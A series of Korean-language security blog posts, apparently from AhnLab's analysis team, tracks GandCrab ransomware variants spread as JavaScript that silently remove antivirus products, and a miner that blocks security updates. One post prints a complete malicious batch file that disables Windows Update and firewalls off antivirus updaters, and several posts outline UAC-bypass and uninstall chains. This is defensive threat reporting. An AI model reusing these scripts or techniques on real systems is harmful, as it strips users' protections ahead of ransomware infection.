현재 자바스크립트 형태(*.js) 로 국내에 유포 중인 GandCrab v5.0.3 에서는 V3 제품 제거와 관련하여 행위 변화가 지속적으로 빠르게 진행 되고 있다. 금일 확인된 형태에서는 %temp%\AhnUn000.tmp 경로에 파일을 복사 한 후 "AhnUn000.tmp -UC" 를 실행하여 제품을 삭제하는 방법이 사용되고 있다.

 


[그림-1] V3Lite 언인스톨 관련 코드 (GandCrab v5.0.3)

 

 

기존에는 -Uninstall 인자 값을 사용하여 삭제하는 형태로 유포 되었지만, 금일 확인된 형태에선 기존 포스팅(*참고: http://asec.ahnlab.com/1169)된 방식에서 -Uninstall 인자값을 더이상 사용하지 않고, -UC 인자 값만 사용한 형태로 확인 되었다.

 

[그림-1]의 코드가 동작했을 때 보여지는 프로세스 구조는 다음과 같다.



[그림-2] 언인스톨 행위 관련 프로세스 구조

 

자사에서는 이러한 행위 변화와 관련하여 아래와 같이 행위기반의 차단을 통해 언인스톨되지 않도록 한다.

 


[그림-3] 행위 탐지

 

V3 제품에서 파일 기반의 진단은 다음과 같다.

- JS/GandCrab.S1

- JS/GandCrab.S2

- Win-Trojan/Gandcrab09.Exp


Posted by 분석팀

안랩 ASECGandCrab의 새로운 버전인 v5.0.3이 유포되고 있는 정황을 포착하였다유포되고 있는 자바스크립트 형태(*.js)는 변경되지 않았으며, V3 제품 제거 명령어도 어제 포스팅(*참고: http://asec.ahnlab.com/1169)과 같다.


[그림-1] V3 Lite 언인스톨 관련 코드(GandCrab v5.0.3)


[그림-2] GandCrab v5.0.3 감염 배경화면


상기 그림과 같이 감염 시 변경된 바탕화면에는 v5.0.3 버전이 명시되어 있다.


[그림-3] GandCrab V5.0.3 랜섬노트


랜섬노트는 업데이트 된 버전뿐만 아니라 어떤 경우에도 해당 파일에 대하여 삭제하지 말라는 경고 문구가 추가되었다.

 

[그림-4] GandCrab 내부 버전


내부 버전도 5.0.3으로 업데이트 되었으나, 기능상으로는 v5.0.2와 큰 차이는 없는 것으로 보인다.


[그림-5] V3 Lite 삭제 행위 탐지 화면


GandCrab v5.0.3이 실행되기 전, V3 Lite에 대하여 삭제 행위에 대하여 상기 그림과 같이 차단되어 동작하지 못하며, GandCrab이 실행되더라도 랜섬웨어의 파일 감염 행위로 Malware/MDP.Ransom.M1947로 행위기반 차단되고 있다.


V3 제품에서 파일 기반의 진단은 다음과 같다.


- JS/GandCrab

- JS/GandCrab.S1

- JS/GandCrab.S2

- Trojan/Win32.Gandcrab


Posted by 분석팀

현재 자바스크립트 형태(*.js)로 국내에 유포 중인 GandCrab v5.0.2 에서는 V3 제품 제거와 관련하여 행위 변화가 빠르게 진행되고 있다. 금일 확인된 형태에서는 "Uninst.exe -Uninstall"를 이용한 제거와 함께 "AhnUn000.tmp -UC"를 통한 방식 2가지를 함께 사용하고 있다.


[그림-1] V3Lite 언인스톨 관련코드 (GandCrab v5.0.2)



현재까지 확인된 V3 Lite 언인스톨 행위 대상 프로세스의 변화는 다음과 같다.

- wmic.exe -> cmd.exe -> runas.exe


[그림-1]에서의 2가지 방식 모두가 동작했을 때 보여지는 프로세스 구조는 다음과 같다.


[그림-2] 언인스톨 행위관련 프로세스 구조


자사에서는 이러한 행위변화와 관련하여 아래와 같이 행위기반의 차단을 통해 언인스톨되지 않도록 한다.




V3제품에서 파일기반의 진단은 다음과 같다.


- JS/GandCrab.S1

- JS/GandCrab.S2

- Trojan/Win32.Gandcrab





Posted by 분석팀

암호화폐 채굴 목적의 악성코드에서 실행하는 배치파일(*.bat)에 의해 안랩의 V3 Lite와 Safe Transaction 제품 등 다양한 백신 제품들에 대한 업데이트를 무력화하는 형태가 확인되었다. 


배치파일의 내용은 다음과 같다. 'Windows Defender' 및 '윈도우 업데이트 서비스', '백신제품 업데이트 프로세스'를 방화벽 차단 리스트에 등록하여 업데이트를 무력화한다. (인바운드, 아웃바운드 모두 차단)


@echo off

powershell -Command "&Add-MpPreference -ExclusionPath ""%appdata%\Windows Defender"""

wscript.exe "%appdata%\Windows Defender\dwge0E7M515s6FzFXS8pkbX9I5M6Nv.vbs"

timeout /t 30

net stop wuauserv

sc config wuauserv start= disabled


%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="OpenVPN1.0" dir=in action=block program="C:\Program Files\AhnLab\V3Lite30\MUpdate2\MUpdate2.exe"

%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="OpenVPN1.0" dir=out action=block program="C:\Program Files\AhnLab\V3Lite30\MUpdate2\MUpdate2.exe"


%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="OpenVPN2.0" dir=in action=block program="C:\Program Files\ESTsoft\ALYac\AYUpdSrv.aye"

%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="OpenVPN2.0" dir=out action=block program="C:\Program Files\ESTsoft\ALYac\AYUpdSrv.aye"


%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="Torrentservice" dir=in action=block program="C:\Program Files\Naver\NaverVaccine\NvcAgent.npc"

%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="Torrentservice" dir=out action=block program="C:\Program Files\Naver\NaverVaccine\NvcAgent.npc"


%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="Msn Messenger" dir=in action=block program="C:\Program Files\AVAST Software\Avast\setup\instup.exe"

%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="Msn Messenger" dir=out action=block program="C:\Program Files\AVAST Software\Avast\setup\instup.exe"


%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="Skype updater" dir=in action=block program="C:\Program Files\AhnLab\Safe Transaction\MUpdate2\MUpdate2.exe"

%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="Skype updater" dir=out action=block program="C:\Program Files\AhnLab\Safe Transaction\MUpdate2\MUpdate2.exe"


%WINDIR%\system32\NetSh.exe Advfirewall set allprofiles state on

schtasks /create /xml "%appdata%\Windows Defender\7MV98fc27hVbvWmBM43veOE8Lk0uY2.xml" /tn "Windows Local Network Service"  


해당 배치파일 실행 시, V3Lite 제품의 경우 아래와 같이 업데이트 오류창이 발생한다. 정상적인 인터넷 사용이 가능한 환경에서 아래와 같은 창이 발생하면 해당 악성코드에 의한 방화벽 차단을 의심해볼 필요가 있다.




악성코드에 의해 방화벽 차단으로 등록되었는지 여부는 윈도우 버튼클릭 후 '프로그램 및 파일 검색'에서 "wf.msc"를 실행하여 보여지는 아래의 프로그램을 통해 확인할 수 있다. 배치파일에서 안랩 V3Lite와 Safe Transaction 제품과 관련해서는 각각 'OpenVPN1.0'과 'Skype updater' 이름으로 등록하였음으로 해당 항목의 값이 아래와 같이 인바운드, 아웃바운드 모두 차단된 것을 알 수 있다.





V3 제품에서는 이러한 행위 시도와 관련하여 아래와 같이 사전에 행위진단을 통해 방어하고 있다.



미 감염되어 이러한 증상이 확인된 경우에는 아래의 링크에서 제공하는 Ahnlab 전용백신(Registry Fix Tool)을 통해 방화벽 허용 조치 후, 백신을 업데이트 하면 된다.


전용백신 URL: https://www.ahnlab.com/kr/site/download/product/productVaccineList.do


이러한 악성코드에 대해 V3에서 다음과 같이 진단하고 있다.


- Trojan/Win32.Agent (2018.09.12.00)

- BAT/AVKill.S1 (2018.09.14.03)

- Malware/MDP.behavior.M2008



Posted by 분석팀

한글윈도우 사용자만 감염한 Magniber 랜섬웨어


2017년 10월 국내에 유포되기 시작한 매그니베르(Magniber) 랜섬웨어는 한글 윈도우 사용자만을 타깃으로 동작하여 이슈가 되었다. 



[출처]: https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/



자사는 2018년 4월에 ASEC블로그를 통해 Magniber 랜섬웨어 확장자 별 복구툴을 배포하였고, 파일리스(Fileless) 형태의 유포방식에 대한 행위기반 탐지기능이 강화되면서 7월 16일 부터는 한국이 아닌 다른 아시아 국가로 감염대상이 확대되었다.


[출처]: https://blog.malwarebytes.com/threat-analysis/2018/07/magniber-ransomware-improves-expands-within-asia/



Magniber 에서 GandCrab으로의 전환


국내에서 멀버타이징 기법을 통한 랜섬웨어 유포지를 모니터링 하는 과정에서 올 4월 11일 부터는 Magniber 에서 GandCrab 으로 랜섬웨어가 바뀐 사실을 ASEC블로그를 통해 공개하였다.  (참고: http://asec.ahnlab.com/1128)


GandCrab은 악성코드 내부에 국내 사용자만을 타깃으로 제작한 부분이 없으며, 글로벌하게 감염피해로 인해 이슈가 되는 상황이다. 현재 국내에서도 이력서, 정상 설치파일 위장 등 사회공학적 기법을 통한 유포 및 취약점(Rig, GrandSoft)을 통한 전파가 활발하게 진행되고 있다. 현재 다양한 GandCrab 유포방식 중, 국내 감염 피해가 많은 방식은 구글(Google)을 통한 폰트, 유틸, 설치파일 검색 시 상단에 노출되는 (공격자 제작)웹 페이지를 통한 다운로드 형태이다. (참고: http://asec.ahnlab.com/1166)



국내 IP만 다르게 유포되는 GandCrab


구글 검색 페이지를 통해 GandCrab 다운로드 유도하는 웹 사이트 중 한 곳을 대상으로 국내 IP로 접속했을 때와 해외 IP의 경우에 서로 다른 형식의 파일이 다운로드 됨을 확인하였다. 국내 IP로 접속한 경우에는 ZIP 압축파일(내부에 자바스크립트 포함) 형식으로 다운로드되며, 해외 IP의 경우에는 EXE 형식으로 다운로드되고 있다. 자바스크립트 코드에서는 내부에 암호화된 GandCrab(EXE파일)을 생성 및 실행하는 기능 외에 V3Lite, AVAST, Windows Defender, Microsoft Security Client 를 제거하는 기능이 존재한다. 이러한 백신제품에 대한 무력화 시도는 GandCrab 랜섬웨어 자체에는 존재하지 않는 것으로 제작자에 의해 국내 사용자만을 타깃으로 별도로 수행되는 기능임을 알 수 이다.


[그림-1] EXE 형태로 다운로드 (국외 IP)



[그림-2] 압축파일 내부 JS 형태로 다운로드 (국내 IP)


2018년 국내에 이슈가 되고있는 Magniber, GandCrab 2가지 랜섬웨어 사례를 볼 때, 랜섬웨어 제작자에게 한국이 주요한 공격대상이 되고 있음을 알 수 있다. 이는 상대적으로 인터넷 사용자가 많은 상황 및 해외에 비해 무수히 많은 지불대행업체들이 존재하여 일반 사용자로 하여금 쉽게 비트코인 형태의 비용을 지불할 수 있는 환경 등이 원인으로 추정된다. 이번 GandCrab 유포 시 국내 IP 사용자의 경우만 백신 무력화 기능이 존재하는 것이 확인된 상황에서 안랩은 지속적인 모니터링을 통해 국내 사용자의 감염피해를 예방하고자 한다.


Posted by 분석팀

구글(Google) 검색을 통해 폰트, 유틸, 다양한 설치파일 다운로드 검색 시 노출되는 웹 페이지를 이용한 GandCrab 유포 모니터링 중 새로운 v5.0.2 버전이 확인되었다. 아래의 [그림-1]은  "유튜브 프리웨어 download" 키워드로 구글 검색 시 최상단에 위치하는 페이지를 나타낸다.


[그림-1] 구글 검색 페이지에 노출된 유포 사이트


아래의 [그림-2]는 유포 사이트에 접속하여, 다운로드 링크 클릭 시 ZIP 형식의 압축파일(유튜브_다운로드.zip)이 다운로드됨을 알 수 있다. 아래 사이트는 최초 접속시에만 보여지는 화면이며, 재 접속시에는 다른 페이지로 전환되는 것을 볼 때, 제작자에 의해 의도된 현상으로 추정된다.


[그림-2] 다운로드 받은 ZIP 압축파일



[그림-3] 동일 사이트 재 접속 시 화면


압축파일 내부에는 GandCrab v5.0.2를 포함하는 자바스크립트 파일이 존재하며, 내부에 포함하는 랜섬웨어 내부 버전은 아래와 같이 v5.0.2 임을 확인할 수 있다.


[그림-4] 압축파일 내부의 자바스크립트 파일


[그림-5] GandCrab 내부 버전


감염 시 변경되는 확장자는 v5.0.1과 동일하게 랜덤하게 바뀌며, 아래의 [그림-6]는 암호화 후 사용자에게 보여지는 랜섬노트를 나타낸다.


[그림-6] GandCrab v5.0.2 랜섬노트


해당 자바스크립트 내부에는 여전히 V3 Lite 제품에 대한 언인스톨 기능이 존재하며, 실행방식에서의 변화가 확인되었다. 기존에 실행했던 제품 설치경로가 아닌 %temp% 경로에 "uninst.exe" 파일을 (사용자 컴퓨터 이름으로 파일명 변경 후)복사하여 실행하는 방식을 사용하였다. 자바스크립트에서 수행하는 안티바이러스 제품에 대한 무력화 시도는 AVAST와 안랩 2개의 제품에 대해서만 이루어지고 있다. 최초 안랩만을 타겟으로 유포되다가 AVAST가 추가된 형태로 볼 때, 국내 사용자들이 주로 사용하는 제품을 타겟으로 공격이 이루어지는 것으로 추정된다.


[그림-7] uninst.exe 실행방식의 변화


V3제품에서는 아래와 같이 V3Lite 제거행위에 대해 행위차단을 수행하고 있으며, 파일에 대한 진단도 가능하다.


- JS/GandCrab.S1 (2018.10.02.03)

- JS/GandCrab.S2 (2018.10.02.03)

- Trojan/Win32.GandCrab (2018.10.02.04) 

- Malware/MDP.KillAV.M2016



[그림-8] V3 Lite 삭제 행위 차단

Posted by 분석팀

9월 6일에 구글(Google) 한국어 검색 시 노출되는 페이지를 통한 자바스크립트 형식의 GandCrab 랜섬웨어 유포를 소개하였다. (http://asec.ahnlab.com/1156) 주말 사이 수집된 아래의 자바스크립트 파일이름을 볼 때, 여전히 정상 유틸을 위장하여 유포되고 있음을 알 수 있다. 또한, 자바스크립트에 의해 생성되는 GandCrab 내부버전은 기존 5.0에서 5.0.1로 새롭게 변경되었다.


- 유트브_프리웨어.js

- 한글_windows_7_iso.js


[그림-1] GandCrab v5.0.1



감염시 사용자에게 보여지는 랜섬노트는 HTML형식에서 TXT형식으로 다시 변경되었으며, 랜덤한 5바이트 고정길이 확장자에서 랜덤길이로 변경되었다. 아래의 [그림-2]는 v5.0.1에 감염 후 사용자에게 보여지는 랜섬노트를 나타낸다.


[그림-2] GandCrab v5.0.1 랜섬노트 


유포 자바스크립트 파일 분석결과, V3 Lite 제품제거 기능의 동작방식에서 변화가 확인되었다. "WMIC.exe" 윈도우 시스템 프로세스를 이용한 V3Lite 제품에 대한 제거기능이며, 아래의 [그림-3], [그림-4] 순서로 제품제거가 수행된다.


- (기존-1) "eventvwr.exe" or "fodhelper.exe" -> "powershell.exe" -> "uninst.exe" (~9/25)

- (기존-2) "eventvwr.exe" or "fodhelper.exe" -> "powershell.exe" -> "cmd.exe" -> "uninst.exe" (9/26~)


UAC(User Account Control) 우회를 위한 운영체제 별 "eventvwr.exe" 혹은 "fodhelper.exe" 사용 및 "powershell.exe"을 통한 동작은 기존과 동일하며 "powershell.exe"을 통해 "WMIC.exe"를 실행하는 것이 새롭게 변경된 부분이다.

[그림-3] WMIC 를 이용한 Uninstall 시도


[그림-4] Uninst.exe 프로세스 구동화면


아래의 [그림-5]은 PowerShell.exe를 이용하여 WMIC.exe를 통한 V3Lite 제거기능의 코드부분을 나타낸다.

[그림-5] WMIC.exe 이용한 V3Lite 제거기능


V3제품에서는 아래와 같이 V3Lite 제거행위에 대해 행위차단을 수행하고 있으며, 파일에 대한 진단도 가능하다.


- JS/GandCrab.S1 (2018.10.01.02)

- JS/GandCrab.S2 (2018.10.01.02)

- Trojan/Win32.GandCrab (2018.10.01.00)



[그림-6] 행위차단 화면



Posted by 분석팀

9월 26일 확인된 (GandCrab v5.0 유포에 사용되는)자바스크립트 파일에서 V3 Lite 제품 언인스톨(Uninstall) 행위에서의 변화가 확인되었다. 기존에 PowerShell.exe 하위에 Uninst.exe 프로세스가 실행되는 구조에서 cmd.exe가 추가되었다.


(기존) "eventvwr.exe" or "fodhelper.exe" -> "powershell.exe" -> "uninst.exe"

(변경) "eventvwr.exe" or "fodhelper.exe" -> "powershell.exe" -> "cmd.exe" -> "uninst.exe"


아래의 [그림-1]은 변경된 자바스크립트에서 V3 Lite 제품에 대한 언인스톨 관련 코드의 변화를 나타낸다.


[그림-1] 언인스톨 방식의 변화


그 외의 AVAST 백신 언인스톨 및 Windows Defender, Microsoft Security Client 서비스 제거 등의 기능은 동일하며 내부에 포함하는 GandCrab은 v5.0으로 확인되었다. V3 Lite 제품에서는 이러한 변화된 언인스톨 행위에 대해 아래의 [그림-2]와 같이 차단하고 있다.

[그림-2] 언인스톨 행위에 대한 차단


Posted by 분석팀

안랩 ASEC은 GandCrab 제작자가 새로운 버전으로 업데이트를 한 것을 포착하였다. 제작자는 어제(9/24)를 기준으로 v5.0으로 업데이트 하였으며 바탕화면과 랜섬노트 그리고 확장자를 KRAB에서 임의의 5자리 문자열로 변경하였다.

[그림-1] GandCrab v5.0 감염 배경화면

GandCrab에 감염 시 배경화면의 위의 그림처럼 변경되며, 2번째 줄에는 사용자의 컴퓨터 이름을 사용한다. 

[그림-2] 변경된 랜섬노트

랜섬노트는 v4기준 텍스트 파일(.txt)에서 HTML파일로 변경되었으며 한글을 사용한다. 또한 랜섬노트 파일명도 KRAB-DECRYPT에서 [변경된 임의의 확장자]-DECRYPT로 변경되었다. 

[그림-3] 감염된 파일

상기 그림과 같이 파일 감염 시 확장자는 더이상 KRAB을 사용하지 않는다. 앞서 적은 것처럼 임의의 5자리 문자열로 변경된다.

[그림-4] 내부 버전 및 AhnLab 관련 문구

바탕화면과 랜섬노트 뿐만 아니라 내부 버전도 상기 그림과 같이 v5.0으로 변경된 것을 확인할 수 있다. 다만, 이전 버전부터 존재하던 AhnLab 관련 문구는 삭제하거나 변경하지 않았다.

[그림-5] V3 제품 삭제 시도 탐지

상기 그림과 같이 새롭게 변경된 버전 v5.0은 기존과 동일하게 *.js(Java Script) 파일형태로 유포되고 있으며, V3 Lite 제품에 대한 삭제 시도 시 행위탐지 및 차단이 가능하다. 뿐만 아니라 랜섬웨어 파일이 다운로드 되거나 파워쉘(PowerShell)을 통한 파일리스(Fileless) 형태로 실행될 경우에도 V3 랜섬웨어 행위탐지 기법에 의해 차단이 가능하다.

JS 파일

 파일 진단명

 JS/Gandcrab, JS/GandCrab.S1

 행위 진단명

 Malware/MDP.Behavior.M2004

  EXE 파일

 파일 진단명

 Trojan/Win32.Gandcrab(2018.09.25.01)

 행위 진단명

Malware/MDP.Ransom.M1171, Malware/MDP.Connect.M1966


Posted by 분석팀

안랩 ASEC 에서는 국내로 유포되는 갠드크랩 랜섬웨어를 지속적으로 모니터링하고 있다. 그리고 최근 갠드크랩 랜섬웨어 유포 자바스크립트에서 V3 Lite 제품을 언인스톨하는 행위를 포착하였다. 8월 29일에 동일 내용으로 ASEC블로그(http://asec.ahnlab.com/1152)를 통해 V3Lite 언인스톨 기능을 처음으로 소개하였다. 당시 소개된 내용은 사용자에게 V3Lite 언인스톨 화면이 보여지고 클릭을 유도하는 방식이었지만, 현재 유포되는 파일은 언인스톨 화면을 숨기고(Hidden) 버튼 클릭까지 자동으로 이루어지는 방식이다. 즉, 자바스크립트 파일 실행 시 V3Lite 제품이 사용자 모르게 제거되고, 이후 갠드크랩 랜섬웨어가 생성/실행되는 구조로 고도화 되었다.


[그림 1] - 난독화된 스크립트 코드


유포 스크립트는 [그림 1]과 같이 지난 8월 29일 블로그를 통해 공개된 스크립트와 동일한 난독화 방식을 사용하고 있다. 이전과 동일하게 자바스크립트의 메인함수에서는 아래와 같은 기능들을 수행하며, 붉은색 표시부분이 새롭게 추가된 기능이다.

- AVAST 백신제거 (new)

- Windows Defender 서비스 제거

- Microsoft Security Client 서비스 제거

- V3 Lite 자동 언인스톨 (new)

- 갠드크랩 랜섬웨어 생성 및 실행


기존 유포스크립트와의 차이점은 아래와 같으며, 기존에 V3 언인스톨러를 실행시켜 사용자에게 제거를 유도하는 방식이 아닌, V3 제거를 직접적으로 수행하는 방식이 추가되었다.  감염 시스템의 윈도우 버전에 따라 유효한 UAC 우회기법을 사용하여 파워쉘 코드가 실행되는 구조이다.

- V3 Lite 언인스톨 화면 숨김 및 자동 버튼클릭

- 파워쉘을 통한 Fileless 기법의 갠드크랩 다운로드 기능 제거 


[그림 3] - V3Lite 자동 제거기능의 코드(uvxvfxx.js)


[그림 3]은 V3를 직접적으로 제거하는 기능이 포함된 자바스크립트(uvxvfxx.js)의 난독화가 해제된 모습니다. 해당 스크립트는 윈도우 버전에 적합한 실행방식을 통해 인코딩된 파워쉘 스크립트를 디코딩 과정을 거쳐 실행한다. 


[그림 4] - 디코딩된 파워쉘 스크립트의 메인함수


[그림 5] - 언인스톨 화면 숨김 및 버튼클릭 


[그림 4]는 디코딩된 파워쉘 스크립트의 메인함수이다. 해당 메인함수는 V3 언인스톨러를 실행하고 실행된 프로세스의 윈도우 핸들을 얻어와 공격자가 미리 정의해둔 SendKeyMe 함수로 핸들을 전달한다. [그림 5]는 파워쉘의 Add-Type 기능을 통해 공격자가 정의한 C# 클래스이며, 내부에 정의된 SendKeyMe 함수를 확인할 수 있다. SendKeyMe 함수의 기능은 아래와 같다. 

언인스톨 윈도우창에 [Enter] 메시지를 전송하여 제거 버튼 클릭 행위

- 언인스톨 윈도우창을 숨김


안랩 제품에서는 비정상적인 V3 Lite 언인스톨 행위에 대해 아래와 같이 행위로 차단하고 있다. 


[그림 6] - V3 제거 행위 시 차단


안랩 제품에서는 스크립트 파일 및 랜섬웨어를 아래와 같이 진단하고 있다. 갠드크랩 랜섬웨어 다운로드에 의한 동작 및 파워쉘을 통한 파일리스(Fileless) 형태 모두 행위차단이 가능하다.


유포 JS 파일

파일 진단명

JS/Gandcrab, JS/GandCrab.S1

랜섬웨어

실행파일

파일 진단명

Trojan/Win32.Gandcrab (2018.07.05.05)

행위 진단명

Malware/MDP.Ransom.M1171

비정상적인 

V3 제거 행위

행위 진단명

Malware/MDP.Behavior.M2004


Posted by 분석팀